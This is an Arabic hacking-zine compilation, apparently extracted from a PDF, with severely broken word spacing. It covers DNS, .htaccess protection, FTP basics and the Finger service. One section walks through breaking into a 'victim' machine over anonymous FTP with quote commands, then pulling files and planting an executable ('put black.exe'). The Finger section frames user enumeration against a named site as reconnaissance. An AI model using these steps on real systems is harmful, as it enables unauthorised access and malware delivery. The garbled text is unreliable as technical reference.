برنامجالیونكس BIND اى Domain). (Berkeley Internet Name و هنالكبرامج عدیدة مثل 

هذهللویندوز و الماكنتو ش,وغیرهااذااراداحداستعمالهم ك DNS SERVER ولكنالكل یفضلال 

. UNIX ویتكونبرنامجال : DNS منجزئین 

the name server itself (the daemon program that listens 

RESOLVER یسمى toوالاخر port 53) 

و ال NAME SERVER هذا یستجیبالى متصف حك عندماتطلبمعلو مهمعینهفمثلا عندماتفتح 

الانترنت اكسبلورر وتكتباوتطلب منه موقهمعین مثل ‏/‏http://www.3asfh.comفسیسأل 

موجودله ‏(و هذا یعتمد على اتصالكبالشبكه و رقمالا ىبىالخا صبك)‏ عن عنوان 

ال IPلهذ ا الموقعالمطلوب 

لان المتصفح یحتاج هذاال IPلیجد السرفر الذ ىلدیه هذاالهوستا ى هذا الموقع و یطلبمحتویات 

http://www.3asfh.com/ 

المتصفحاقرب DNS 

١٦




الموقع منالسرفرلیعرضهالكفى متصف حك.‏ 

وقبل هذا سیسألال daemonفى program جداولهاىفى ذاكره متصف حك عن الموقعالذىتطلبه 

فأذالم یجده ینتقلالى ما سبق شرحه و هكذا تتمالعملیه.‏ 

THE TREE INFORMATION: 

========================= 

الان بعدان اتقفنا علىانك عندماتطلب رقم IP معین منالمتصفح حقك و لا یجدهفىال DNS الم حلي 

ا ى الخا صبك سو فیسألال DNS SERVER الاعلى منهفى المستوى عنهلیجده واذالم یجدهفى 

مستوىاعلىفینتقلللبح ثفى مستوىاعلى واعلى و هكذا یسیرالب حث منالاقل الىالاعلىفى 

مستویاتال.‏SERVERS DNS 

: 

و طبعانتیجه من هذاالاتصالفسنستنتج وجود شجره اتصال و معلومات ولكنكی فتعملبالضب ط دعونا 

نأخذ مثال 

لوفرضناانال ISP الخا صبككان مثلا isp.co.uk و هذایعتمد على اتصالكبالانترن تاى حسب 

الشركه و السرفر الذىتشبك علیهفمنالطبیعى طبعاان یكون ال ISP's DNS server's 

IP حثلك عن والانفالنفر ضانك سألت هذاال DNSلیب dns.isp.co.uk مثل هذا hostname 

الخا ص ب http://www.3asfh.com/ مثلافسیقوم هذاال dns.isp.co.uk بالبحثفى جداوله 

الم حلیه المخذنهفىالذاكره عندهفیجدها و اذالم یجدهافسینتقلكماقلناالى مستوىاعلى منال DNS 

لیب حثفیه واذالمیجدهایضافىالمستو ىالاعلىفعلیهان یقوم بتغییر مكانالب حثكلیا 

فمثلا من dns.isp.co.uk الى some-organization.org.uk او 

‏,‏university.ac.ukوالخ england.gov.uk, airforce.mil.uk وهناكامثلهكثیرا طبعا و 

كل شئ ینتهى ب UK واذالم یجدهایضافىكلالاماكن المتاحله الب حثفیهافسیرجعالمتصفحالى 

موجود علىالشبكه واسمهال ROOTفهو یحتوى علىكل عناوینال IP علىكلللمواقع 

الموجوده علىاى DOMAIN NAME وهذكا حسب هذهالعملیةالتسلسلیةیتنقل ال DNSبحثا عن 

school.edu.uk, 

SERVER 

اكبر DNS 

الدومین . 

متى یفشل ال DNSفيال حصول علىالموقعاوتحدید موقع هذاالدومین ؟ 

====================================== 

أتمنىانتكونالاجابةقد وصلتلأفهامكمقبلانأذكرها وهياماافي حالة عدم وجود هذاالدومین 

بالاصل وسیطولالبحث لانها سیبحثفيكلالمراحل حتى یصلللجذز ویبحثفيكلالايبیات 

أوالدومیناتالمخزنةفیه ومنثم ستكونالاجابة 

البحث ما یقارب ‎٢٠‎ثانیة ١٥ 

الحالة الأخرى 

نتیجه طولالب حثفیقوم متصف حك بقدانالاتصال معال DNS اى عملیه.‏ TIMED OUT 

وفى هذه الحاله نضغطفىالمتصفح على REFRESH او RELOAD طبعا حسب متصف حك 

ROOT 

address could not be found وقد یستمر 

... 

– 

: 

١٧


شرح ملف 

" htaccess 

..... htaccess 

" 


$$$$$$$$$$$$$$ 

BSD-r00t 

$$$$$$$$$$$$$$ 

الكاتب:‏ 

| 

مقدم ة 

‏*اهمیة مل ف 

‏*كیفیة عمل مل ف 

* عمل صفحات 

منع عر ض محتویاتالمجلد الذي لا یوجدبه 

منع/‏ اتاحة دخول الموقع لاشخا صمعینة 

‏*تحویل من یحاول فتحلینكللینكاخر 

| 

* | 

| 

htaccess. | 

| 

htaccess. 

| 

| 

error خاصة 

| 

index 

* | 

| 

* | 

| 

| 

| 

| * عملالمل ف .htpasswd 

| 

| * الحمایةبواسطه htaccess. 

| 

htaccess. 

* | 

| 

| 

| 

| 

-------------------------------------------------- 

منعاظهار المل ف 

‏*اضافة مستخدمینفيالمل ف 

* جعلالصفحا تتظهربامتداداخر 

مقدم ة 

. 

* 

------------ 

مناهم وسائل حمایةالمواقع واغلاق بع ضالاجزاءفیه بكلمة سر ، و منع بع ضالناس من دخل الموقع 

و السماحلغیرهمبالدخول .. هواستخدامالمل ف htaccess. والذي یمكن عملالكثیر والكثیربه . 

و هذا المل ف مخفي و محمي بكلمة سر 

‏*اهمیة مل ف 

index 

htaccess. 

----------------------- 

error خاصةبك 

-٤ 

١- حمایةايجزءفیه بكملة سر 

٢- عمل صفحات 

٣- منع عر ض محتویاتالمجلدالذي لا یوجدبه 

منع/‏ اتاحة دخولالموقع لاشخا صمعینة 

‎٥‎‏-جعل صفحة البدایة بأمتدادات غیر .asp. .. html , 

‎٦‎‏-تحویل من یحاول فتحلینكللینكاخر 

‏*كیفیة عمل مل ف 

htaccess. 

--------------------------- 

یمكنك عمل هذا المل فبواسطهاي محرر نصو ص مثلالنوتباد "Notepad" عن طریق عملللمل ف 

حفظباسم و نحفظالمل فبهذاالاسم htacces. علىان یكونلی سامتداده ‏.‏txtايانلیس هناكاسم 

- علامتيالتنصی صفياسمالمل ف 

للمل ف ‏،اذالمتستطیع ذلكاحفظ المل فباسم 

. - 

"htaccess." 

١٨




* عمل صفحات 

. 

- : 

error خاصة 

------------------------ 

. 

و الفائدة منهاهوانالموقع یظهربشكل افضلكماانه عند محاولةاي شخ ص عمل سكان علىالموقع 

سو ف یظهرانكان الموقعبهكل الثغرات و ذلك لان طریقة عمل السكانر هيانه یقوم بتطبیقكلثغره 

على الموقع و یرصدالنتیجه 

فاذاكانهناكايتغیر یظهرلككأنالموقع علیه هذهالثغره 

و یمكنك عم ل صفحاتال error الخاصه ك عن طریق 

أ-تصمیم صفحاتال errorاولا 

ب-تحمیلالصفحات علىالموقع 

ج-اضافه السطر الكتابيفيالمل ف htaccess. 

ErrorDocument error_num 

directory_file 

ب حی ث یكون error_numهو رقمالخطا ‏"الارقام موجودبالسفل 

صفحهال errorالتيقمت بتصمیمها 

مثال 

" و 

ErrorDocument 404 

. 

: 

/errors/nfound.html 

errors وارقامها : - 

----------------------- 

| Bad Syntax | ٤٠٠ | 

----------------------- 

| Unauthorized | ٤٠١ | 

----------------------- 

| Not Used | ٤٠٢| 

----------------------- 

| Forbidden | ٤٠٣ | 

----------------------- 

| Not Found | ٤٠٤ | 

----------------------- 

ال 

منع عر ض محتویات المجلد الذي لا یوجدبه 

index 

* 

----------------------------------------------------- 

directory_fileهو مكان 

بع ضالمواقع عند محاولة فتحاي دلیل علیها و لا یكونبه مل ف index یقوم الموقعبسرد جمیع 

محتویات هذاالدلیلولحل هذه المشكلهتوجد طریقتین 

أ-‏ وضع مل ف indexفيكلالمجلدات " وبالطبع هذ اصعب جدا 

ب-باستخدامالمل ف htaccess. عن طریقاضافه السطرالتاليفي المل ف 

منع/‏ اتاحة دخول الموقع لاشخا صمعینة 

" 

-: 

Options -Indexes 

-: 

* 

---------------------------------------- 

١٩




.. 

یمكنكباستخدامالملف htaccess. منع شخ صمعین من دخولالموقع بعدمعرفةالايبيالخاصهبه و 

یمكنكالاس تفاده من ذلك حیث یمكنك منع دخلالموقعلمن لاتریدكما یمكنك منع دخولالموقع لاي شخ ص 

فياسرائیل مثلا 

و یمكنك ذلك عن طریقاضافةالسطرالتاليفيالمل ف 

؟؟؟.؟؟؟.؟؟؟.؟؟؟ deny from 

- : 

حیثان ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هوالايبيالخا صبه . 

واذااردت منعاياحد من دخول الموقع یمكنكاضافة السطر التالي 

- : 

deny from all 

- : 

؟؟؟.؟؟؟.؟؟؟.؟؟؟ allow from 

واذااردت السما حلشخ صمعینبدخول الموقع یمكنك ذلكباضافةالسطر التالي 

حیثانا ؟؟؟.؟؟؟.؟؟؟.؟؟؟هوالايبيالخا صبه 

‏*تحویل من یحاول فتحلینكللینكاخر 

------------------------------------- 

وتسمى هذهالعملیه ب Redirection وهي مناهمفوائد ‏.‏htaccessالمل فتستخدم مثلا عندتغیر 

موقع مل فقدیم علىالموقعالى مكان جدیدفیمكنكباستخدامالمل ف htaccess. عند محاولةاحد فتح 

احدالینكالقدیمتوجیههالىالینكالجدید عن طریقاضافةالسطر التاليفيالمل ف 

- : 

؟؟؟.؟؟؟/‏ /somewhere/???.??? Redirect 

http://www.site.com/newlocation 

ب حی ث یكون ‏/‏somewhere‏/؟؟؟.؟؟؟هو مكانالمل فالقدیم و 

http://www.site.com/newlocation ؟./‏ ؟؟ ؟؟؟هو مكانالمل ف الجدید.‏ 

---------- 

* عملالمل ف .htpasswd 

------------------------ 

ویمكنكأنتقوم بعملهبنفس طریقة المل ف htaccess. ، و سو فنعمله حتى نسطیعاستخدامالمل ف 

htaccess في الحمایة و سو ف نكتبفيالمل ف htpasswd ما یأتي 

. 

-: 

user1:EncryptedPwd1 

user2:EncryptedPwd2 

o حیثان user1 , user2 هواسم المستخدم . 

o و 

EncryptedPwd1 , EncryptedPwd2 هيكلمات السر ولكن مشفره و یمكنكتشفیراي 

كلمةتریدها عن طریق الموقع 

http://www.euronet.nl/~arnow/htpasswd 

او http://www.e2.u-net.com/htaccess/make.htm 

فمثلالواردنا وضع یوسرباسم Security وكلمةالسر الخاصةبه هي fu93hds3 نذهباولا الى 

الموقع 

http://www.euronet.nl/~arnow/htpasswd 

username : Security و o 

passwrod & re-enter password : و fu93hds3 o 

Security:893bNicBcwszw




‏*الحمایةبواسطه htaccess. 

---------------------------- 

. 

وتعتبرالفائدةالرئیسیةللمل ف حیثانه یمكن منعاياحد من دخول دلیلمعینفيالموقعالااذاكانمعه 

كلمة السر والیوسر نیم ‏،فیمكنك عن طریقها عمل منتدى خا صاواي شئترید.‏ 

فعند وضعالمل ف ‏.‏htaccessفياي دلیل و حاولاحد دخول هذاالدلیلاوايجزء یندرجتحته سو ف 

یطلب منه كلمة سر و یوسر 

و یمكنك عمل ذلك عن طریقاضافة ما یأتيفيالمل فقبل نسخهفيالدلیلالمراد حمایته 

--: 

AuthUserFile 

AuthName "Enter your user and passed " 

user-Require valid 

AuthType Basic 

/somewhere/.htpasswd 

please 

 

require valid-user 

 

oب حی ث یكون somewhere/.htpasswd‏/هو مكان مل ف htpasswd. على موقعك 

o و یكون Enter your user and passed please هي الرساله التي سو فتظهر لتطلبكلمة 

السر 

منعاظهار المل ف 

htaccess. 

* 

----------------------------- 

قد عرفناالانانلهذا المل فاهمیهكبیرهفیجب علیناان نحمیه جیدا ‏،فالبرغم منانالمل ف مخفيالا 

انه غیر سالم منان یكون السرفر نفسه غیر مؤمناوانههناكتصریح خطأ 

لذلك سو ف نمنع عر ض هذاالمل ف عن طریقاضافة ما یأتي 

.. 

 

order allow,deny 

- : 

deny from all 

 

فاذا حاولاحد عر ضالمل ف سو ف یظهرله . error 403 

* جعلالصفحا تتظهربامتداداخر 

------------------------------- 

ویمكنباستخدام هذهالخاصیة عمل مل ف یظهركأنامتداده 

باضا ف السطر التالي 

html. ولكنه ذوامتداد txt. مثلا . 

AddType text/plain html 

- : 

-: 

ویمكنك رؤیةكافةالتغیراتالتي یمكنك عملهافي هذاالمل ف 

http://www.pharaonics.net/books/MIME.txt 

... 

٢١


" FTP 


نظام نقل الملفات 

.......... 

" 


$$$$$$$$$ 

الكاتب:الجوكر 

$$$$$$$$$ 

ما هو نقلالملفا ت FTP؟ 

FTPهياختصارلكلمة File Transfer Protocol وتعنيبروتوكول نقل الملفات،‏ وهذهالخدمة هي 

احدىتسهیلات TCP/IP التيتجعل منالممكن نقلالملفا تبین الكمبیوترات علىالشبكة ومن میزات 

FTPالرائعةأنهاتقوم بترجمة شكل الملفاتالنصیةبطریقةأتوماتیكیة حیثأنالكمبیوتراتتحتوي نظم 

تشغیل مختلفة وعلیهفلدیهاأشكال Formats مختلفةللملفاتالنصیةفبالتاليتحتاج لترجمة وهو ماتقوم 

به FTP, وبخدمة نقل الملفاتفاننانحتاجلبضع نقرات على الفأرةكي ننقل ملفاًفيأمیركا الى جهازنا . 

أقسام نقلالملفات : 

: 

. 

نقل الملفات ینقسمالىقسمین : 

تنزیل الملفا ت:‏Download 

وهو جلبالملفات منالكمبیوترالمضی ف Host الىالجهازالم حلي.‏Local 

ارسالالملفا ت:‏Uplaod 

وهوارسال الملفات منالكمبیوتر الم حلي Local الىالكمبیوترالمضی ف.‏Host 

ومنالناحیة الأمنیةفهناك نوعانلنقل الملفات : 

نقل مؤمن:‏FTP Secure 

تحتاج الىاسم مستخدم وكلمة مرورللدخولالى النظاموت حصل علیه من مدیرالنظامالمضیف.‏ 

نقل مجهول:‏FTP Anonymous 

لاتحتاجالىاسم مستخدم وكلمة مرورللدخولوتستطیع غالباًاستخدام guestأو anonymous 

عوضاً‏ عنهما.‏ 

تصن ف مصادر البرامج علىالانترنت الىثلاثةأقسام 

ملكیة عامة:‏Domain Public 

وضعتالبرامج هناللاستخدام العامفلیس هناك حقوق ملكیةلأحد ولاقیود علىاستخدامهاوتوزیعها 

وتعدیلها 

مصادر مجانیة:‏Freeware 

یح قللجمیعاستخدام هذه البرامجأوتوزیعها ولكن هناك حقوق ملكیة ونشر ولا یجوزتعدیلهاأوبیعها.‏ 

مصادر مشتركة:‏Shareware 

یتمتوزیع هذهالبرامجبغر ض التجربةقبلالشراء وقدلاتتضمن جمیعالممیزات ویجبت حطیم النسخ بعد 

انتهاء مدتها.‏ 

FTPو الفیروسات 

: 

یجبأنتعلمفيالبدایةأن الملفات والبرامجتنقسمالىقسمین 

ASCII: 

٢٢




اختصاراًل Interchange) American‏)والملفا Standard Code for Information ت من 

هذا النوعتحتوي على سبعة جزیئا ت bits تتراو حقیمتهابینالصفر و ١٢٧. ویستخدم هذاالمصطلح 

للتعبیر عن المعیارالذي یقوم بتحویلالأحر فالىأرقامفيالكمبیوتر.‏ وتستخدمالملفاتالنصیة هذاالنو ع 

منالصیغ.‏ 

Binary: 

وتعنيالملفات ذاتالنظامالثنائي وتحتوي علىثمانیةجزیئات bits تتراو حبینالصفر و ٢٥٥ وتندرج 

الصور والبرامج والملفات المضغوطةتحت هذاالنو ع.‏ 

والفیروسات لا یمكنأنتنتقل عبر ملفات ASCIIكما لایمكنأنتنتقل عبرالصوركصیغ & gif jpg & 

avi - ram - mpg - mp3 - منامتداداتالصور ولا عبر ملفاتالفیدیو والصوت مثل bmpوغیرها 

wavوغیرها ، وبمعنى آخرفانهاتنتقل عبر البرامج وملفاتالنظام والتشغیل والبرامج المضغوطة وعادة 

ماتكون - xxe : exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - 

bhx، b64‎كما - یمكنأنتنتقلفیروساتالماكرو عبرتطبیقا ت Office، MSلذلكاحذر من هذه 

الملفات واف حصها دائماًقبلتشغیلها.‏ 

طریقة نقل الملفا ت : FTP 

هناك طرق عدیدةلنقلالملفات وهي : 

نقل الملفاتباستخدام نظامUNIX 

تتطلب هذهالعملیة عادةاستخدامأوامر وهاهنا بع ضأوامر:‏UNIX 

لنقل ملفات ASCII النصیة،‏ وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجب 

اعادةالأمر.‏ 

لنقل الملفاتالثنائیة،‏ وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجباعادة 

الأمر.‏ 

لفح ص المل ف ومعرفة هل هو من نو ع ASCIIأو.‏Binary 

لعر ضقائمة بأوامر.‏UNIX 

‏:‏dirعر ض محتویاتالدلیل 

‏:‏lsعر ض محتویاتالدلیلالحالي.‏ 

تغییر الدلیل.‏ 

filename: getجلب المل ف المطلوب وانزاله على جهازك.‏ 

filename: mgetجلب مجموعة منالملفا ت.‏ 

pwd: طباعةالدلیل الحالي.‏ 

‏:‏byeانهاءالارتباط والخروج من النظامالبعید.‏ 

ascii: 

binary: 

status: 

help: 

cd directory: 

نقل الملفاتباستخدام حساب:‏Shell 

أول ماتفعلهفي هذاالنو ع من نقلالملفات هوادخالالملقنالخا صبشركةتوفیرالخدمةفمثلاً‏ سو فتدخل 

حسابكفي Tripod عن طریق Shell، Unix نكتبأولاً‏ الأمر ftp متبوعاًبالوجهةالمرادةفیصبح : 

ثم ندخلالاسم وهو عل سبیل المثال ‏،"‏IronPrivate‏"ثم نقومبادخالالرقم 

السري وهو مثلاً‏ "******". وبعدالدخول الىال حساب یمكنكاستخدام نفسأوامر Unix المعتادة.‏ 

وإ ذاأردت المزید منالمعلومات عن نظامالUnix 

ftp ftp.tripod.com 

٢٣


علیك الدخوول الى هذاالموقع:‏ 

http://www.pc-worlds.net/lunexx.html 

فهو یفیدالمبتدئینفى هذا النظام . 

نقل الملفاتباستخدامالمتصفح:‏Browser 

نقل الملفا ت عن طریقالمتصفحات سهل جداًفما علیك سو ىادخال عنوان الموقع URL ویبدأ العنوان 

بكلمة ftp‏://ثمالعنوانبدلاً‏ منكلمة http‏://للعناوینالعادیة،‏ بعد الدخول الى موقعال FTP ستأتي 

الصفحة عبارة عن ملفات ومجلدات وماعلیك سو ى النقر على المل ف المطلوب لانزاله.‏ 

نقل الملفاتباستخدام حساب:‏SLIP/PPP 

أفضلاستخدامات هذا النو ع من الربطأنهاتسمحلناباستخدامبرامجتابعة Programs. Client 

وأفضلبرنامجتابع یمكناستخدامهللنوافذ Windowsهوبرنامج.‏Ws_ftp 

استخدامبرنامج 

ادخل على البرنامج وذلكبالنقرالمزدوج علىأیقونةالبرنامج،‏ سیظهرلك مربع حوار Session 

Profileوالذي من خلالهتقوم بتسجیل الدخول،اكتبفي خانة Profileاسم Name حسابالدخول؛ 

اسم الملقن وفي 

هذا المثال هو ftp.tripod.comثمفي خانة Hostاختر Type Autoلكي Detect یقومبالتدقیق 

التلقائيفي نو ع نظامالجهازالمضی ف،‏ بعد ذلكقم بكتابةالاسمفي خانة User ID وهو مثلاً‏ 

ثم الرقم السريفي خانة Passwordوسیظهر مخفیاً‏ علىهیئة نجوم ‏******،ثم 

اضغط ‏.‏OKكمافي الشكل التالي : 

خانة Host Name 

Ws_ftp LE 5.06: 

على سبیلالمثال My Home Page In Tripod واكتبفي 

IronPrivate 

بعد ذلك سیقوم البرنامجبالدخول الىال حسابالمطلوب وستنقسم نافذة البرنامجالىقسمین؛ القسمالأیسر 

هو جهازالكمبیوترلدیك والقسم الأیمنهو جهازالكمبیوترالمضی ف،في هذهالمرحلةتستطیع جلبأو 

ارسالالملفاتأوتغییراسمائهاأو حذفها ‏...الخ.أيتستطیعالتحكمفي محتویات حسابك علىالانترنتأو 

على جهازكبسهولةفائقة.‏ 

نقل الملفاتباستخدامالاتصالالشبكيالبعید Telnet: 

Telnetهيبروتوكولانترنتمعیاريلخدماتالربط عن بعد ویسمحللمستخدمبربط جهازه على 

٢٤


كمبیوتر مضی ف جاعلاً‏ جهازه وكأنهجزء من ذلكالكمبیوتر البعید.‏ ویختل فالعر ض حسب نظامالكمبیوتر 

المضی ف.اذاكان الجهازالبعید یستخدم نظام Windowsفلا مشكلةأمااذاكان یستخدم نظام آخرفیجب 

معرفة بع ضالأوامرللتحكم وأهمأمر یجبأنتعرفههو ‏"؟"‏ والذي یحضرلكقائمةبالأوامراللازمة.‏ 

‏-استخدامبرنامج Telnet من Windows: 

ترفق Windowsبرنامجاً‏ سهلاً‏ یسمى Telnetیمكنك الدخول علیهبالضغط علىقائمةابدأ Startثم 

تشغیل Runثماكتب Telnetوستنفتحلك صفحة البدءللبرنامج..‏ من Connectاختر Remote 

في صندوق الحوار Connect الذي سیظهرلكاكتبفي خانة Host Name اسم ملقن 

الجهازالمضیفثماكتبفي خانة Port المیناءأوالمنفذ ‏(اذاكانلدیك)او اتركهكما هو،ثماختر منال 

، Type Termانكانلدیك والاقمبالتجربة.‏ بعد ذلكاضغط Connect وعندمایتمالربطفستحتاج 

لادخالالاسم والرقمالسري.‏ وبعدالانتهاء منالنقلاختر Disconnectمنقائمة Connect وبعد ذلك 

اختر … Exit 

System. 

٢٥


" 


" الإختراق عن طریقFTP 


$$$$$$$$$$$$$$ 

hacker dz 

$$$$$$$$$$$$$$ 


FTP 

٢١ 

الیوم سوفنتناول طریقة إقتحام عبرالا فتيبي أولا ولنجاح ا لإقتحام یجبان یكونلدى 

الض حیة البور ت مفتوح و هوالبور تالخا ص بال و لتأكد منأنالبورت مفتوح علیكان 

تستعملبرامج السكان وهيكثیرة و مناهمها Superscanne بعدما تتأكدانالبور ت مفتوح ننتقل 

الى الخطوةالثانیة و هي : 

إ ضغط على 

Start 

ثم 

Run 

ثماكتب 

ftp – n 

سو فتطلعلك نافدةفيالدوس مكتوب علیها 

 

To 

أكتببجانب 

To 

رقمالإبيللض حیةثمإ ضغط علىإدخال والآن خدبالكمعي 

إدات حصلت على هداالردفقدتخطیت خطوة 

FTP 

Connected to www.assassin.com 

.(websrv1 Microsoft FTP Service (Version 4.0 ٢٢٠ 

و الآ نأكتب الكتابةالتالیة ftp>quote user ftp 

إدات حصلت على هدا الردفقدتخطیت خطو ة 

Anonymous acces allowed, send identify (e-mail name) as 

٣٣١ 

password. 

و الآ نأكتب الكتابةالتالیة 

ftp>quote cwd ~root 

إدات حصل ت على هداالردفقدتخطی ت خطوة 

530 Please login with USER and PASS 

ثمأكتب الكتابةالتالیة 

٢٦



ftp>quote pass ftp 

إدات حصلت على هداالردفقدتخطیت خطوة 

و نجحتفي ا لإقتحام 

230 Anonymous user logged in. 

مبروكأنتالآنفي جهازالض حیة 

Get 

ما علیكالآنالاانتقوم بإ ستعمال 

اوامرالا فتيبي::‏ 

و طبعالنامر علیها مرورالكراملكي لاتقعوفي المشكلةالي وقع تفیها و هي نجاح ا لإقتحام من دون ما 

أعر ف و لافكرة علىاوامرالفتیبي وإدااردتمانتضحكو بقالیأكثر من ٢٠ دقیقة وانا مجمدالإیديو 

الض حیة عالقة من دونأنأعملأي شيء ولهدا 

قمتبحضیرال ىوامرلكيتطبقوها مباشرةا بعد نجاح ا لإقتحام 

Pwd 

لكيتعر ما یحتویه الهارد دیسك 

Cd 

لإقتحام مجلد مثال 

Cd black 

في هدا المثالقمت بإقتحام مجلد المسمىبلاك 

Ls 

لكيیتضحلك محتو ى المجلدأوالهارد دیسك 

لكيتحمل الى سطح المكتب بتا ع جهازك من جهازالض حیة 

مثال 

Get black.exe 

Put 

العملیةالعكسیة ل 

Get 

یعنيانتأخد مل ف من سطح المكتب بتا ع جهازك وتضعهفي جهازالض حیة 

مثال 

Put black.exe 

Clos 

لقطعالإتصال معالض حیة 

هديأهمالأوامر والآن سونتطرق علىأنوا ع الرسائلالينت حصل علیها من جهازالض حیة أثناءتطبیق 

الأوام و شرحها وارقامها 

Codes: Signification: 

Restart marker reply. ١١٠ 

Service ready in nnn minutes. (nnn est un temps) ١٢٠ 

Data connection already open; transfer starting. ١٢٥ 

150 File status okay; about to open data connection. 

200 Command okay. 

202 Command not implemented, superfluous at this site. 

211 System status, or system help reply. 

٢٧




212 Directory status. 

213 File status. 

214 Help message. 

215 NAME system type. 

220 Service ready for new user. 

221 Service closing control connection. 

225 Data connection open; no transfer in progress. 

226 Closing data connection. 

227 Entering passive mode (h1, h2, h3, h4, p1, p2). 

230 User logged in, proceed. 

250 Requested file action okay, completed. 

257 "PATHNAME" created. 

331 User name okay, need password. 

332 Need account for login. 

350 Requested file action pendingfurther information. 

421 Service not available, closing control connection. 

425 Can't open data connection. 

426 Connection closed; transfer aborded. 

450 Requested file action not taken. (Fichier déjà utilisé par autre 

chose) 

451 Requested action aborded: local error processing. 

452 Requested action not taken. (Pas assez de mémoire pour 

exécuter l'action) 

500 Syntax error, command unrecognized. 

501 Syntax error in parameters or arguments. 

502 Command not implemented. 

503 Bad sequence of commands. 

504 Command not implemented for that parameter. 

530 Not logged in. 

532 Need account for storing files. 

550 Requested action not taken. (Fichier non trouvé, pas d'accès 

possible,...) 

551 Requested action aborded: page type unknown. 

552 Requested file action aborded. 

553 Requested action not taken. (Nom de fichier non attribué) 

.......... 

٢٨


بروتوكول خدمة 

"Finger 

" 


$$$$$$$$$$$ 

الكاتب LAMeR: 

$$$$$$$$$$$$ 

شرح لاحدالبروتوكولاتالمهمةفي جمع المعلوما ت عن مستخدميالموقعاوالسیرفر 

للمعلومیة وقبل البدءبهذاالموضو عفهذاالبرتوكولیعمل على البورت 79 

1.1 مقدمة عنFinger 

‎1.2‎استخدامFinger 

ب ع ضالخد ع عنداستخدام خدمةFinger 

‎1.4‎الأستعلام عن طریق موقع بأستخدامFinger 

‎1.5‎الأستنتاج من هذا الدرس 

‎1.6‎الختام 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

معین ) 

. 

1.3 

1.2 مقدمة عنFinger 

 

إنّ‏ Finger دیمون خدمةتعمل عن طریق البورت ٧٩ عادة وكانت 

مستخدمةأصلاكنوع businesscardرقميللناس 

المستخدم البعید ) user remote ‏)یمكنأن یرسل طلبإلى Finger دیمون یجري على نظام 

بورت Finger نوعیة ‎٧٩‎‏)وسی حصل علىإجابة.‏ 

هذهالإجابة ستخبرك منهم المستخدمین على هذا النظام وأیضا بع ض المعلومات عن هؤلاءالمستخدمین 

المتصلی نبالنظام.‏ 

إ ضافةإلى هذه المعلومات،فيأغلبالأحیانالإجابةتخبركأیضا من الذي یدیر النظام admin) ‏)وكی ف 

قامبالإتصال.‏ 

قدیمااستخدمالناسالأتصال على جمیعانوا ع الأنظمةفيالعالم وطلبالأستعلام عن هذه الأنظمة وال 

Finger یعطیهممعلومات عن الموجودینفيالنظام وهللهم حساباتفي هذا النظام.وكان Fingerكان 

یستخدمقدیمافي الجامعات والشركاتالكبیرةأیضا.‏ 

في الماضي ‏،ال Finger إ ستعمل عامة عن طریق الطلابفيالجامعات اذاارادوا معلوماتتخ ص طلاب 

اخرینفي نفسالجامعه . وكثیرا ماتكون الأجابة 

أعلمني 

أماالآن ومع وجود شبكة ا لإنترنت العالمیةاصبحFinger أقل شهرة ‏،لأنهتوجدالآن مواقع الویب 

رقمیة خاصةبمستخدمین الأنترنت وبسبب ملاحظة الناسالتهدید 

للعملكبطاقة 

الواسعللأمنالألكترونيقلّاستخدام خدمةDeamon Finger 

‏(اجابة ) Deamon Fingerبجملة " Finger 

" ! 

عمل (bisinesscard) 

. 

" ‏!‏meاي " 

علىأیة حال،لیسكلالأنظمة منعت هذهالخدمة وستجد بع ضالمواقع ‏(الأنظمة)تقدم هذه الخدمة.‏ وهذه 

الأیام یقوم الهكرزبمحاولاتاختراقالأنظمة بأستخدامبرامج portscans للب حث عن البورتات 

المفتوحة.‏ . ‏.بدونأيّأساس علمي 

لذلكإنّ‏ Finger دیمون،‏ مثال عظیملخدمةیمكناستخدامهاقانونیا لتزودك بكمیة ضخمة من المعلومات 

ال حسّاسة 

٢٩




حول هد ف.‏ 

لهذا سو فأحاولاناشرحفي هذاالدرسبلغة مفهومة 

ما هو Finger دیمون وماذا یفعل وكیف یمكناستخدامهفي مصلحتك 

الخلاصة المقدمة:ان خدمة Fingerكانتقدیما ولازال تتستخدملجلبالمعلومات عن المستخدمین 

الموجودینفيالنظام وهللدیهم حساباتفي هذا النظامام لا.‏ 

: 

ملاحظة ‏:النظام ) server ‏)هو جهازكمبیوترتخزنفیهمعلوماتهائلة ویستخدمفياستضافةالمواقع 

‎1.3‎استخدامFinger 

 

عنداستخداماي منبرامج السكان المعروفة مثل ) superscan‏)للب حثفي موقعمعین 

http://www.israel.com/ ) ووجدتبه منفذ Port‏)بور ت)‏ ٧٩ مفتوحا هذایعنيان 

http://www.israelr.com/ 

له Finger دیمونیعمل.‏ 

عن طریق وندوز 

الآنكی ف 

صلل Finger 

خا فيأغلبالأحیان وندوز لا یوجدبه زبون (client) سو ف نستخدم Telnetكخادمل Finger 

توضیح--‏ 

) مثلا 

مركب ) installed ‏)لذلك 

نقومب request) ( طلباستعلام؟ 

-- 

Telnet(client) --------request-------> Finger Deamon(in Server) o 

الآتيفي موجة الدوس:‏ ) DOS (MS 

79http://www.foobar.com/telnet 

. 

عن طریق كتابةالسطر 

بعد ذلك سیظهرلكبرنامج telnet و منهتطبع الأوامر 

اما من یونیك سلسنابحاجةإلىأن نستعملتیلن تلأنه یوجدبنظاملینوكس زبون(‏client‏)‏ خا صبخدمة 

مركّب على النظامبشكل دائمتقریبا.‏ 

ملاحظة سیكونالشرحالتالي حتى نهایةالدرسلمستخدميلینوك سأماأذاقررتالأستمرار بأستخدام 

وندوز ستكون كتابةالأوامرفي موجه الدوسثمفيالتلنت وستكون كتابة الأوامرهي نفس الأوامر التي 

تكتب بأستخدام نظاملینوكس ولكنبدل نضع ‏"مسافةثم ‏"‏wwwفي الوندوز مراعیااسمالموقع 

مثلا یكون كتابة الأوامرفيلینوكس هكذا 

Finger Deamon 

::: 

"@ " 

: 

finger@anyname.com 

http://www.anyname.com/finger : 

لاحظالمسافةبین finger و www 

) على افترا ضانكتستخدم ) shell ( unix 

finger@israel.com 

ولكنفي وندوز سیكون هكذا 

اطبعفي مح ثالأوامرفي یونكس 

لاحظان الهد ف ‏(ل معرفة منهم مستخدمي هذاالموقع ‏)هناهو ‏/‏http://www.israel.comكمثال 

فستظهرالنتائج:‏ 

Login: Name: Tty: Idle: When: Where: 

root israel sys console 17d Tue 10:13 node0ls3.israel.com 

Amos Amanda 

Anderson Kenneth 

Bright Adrian 

Doe John 

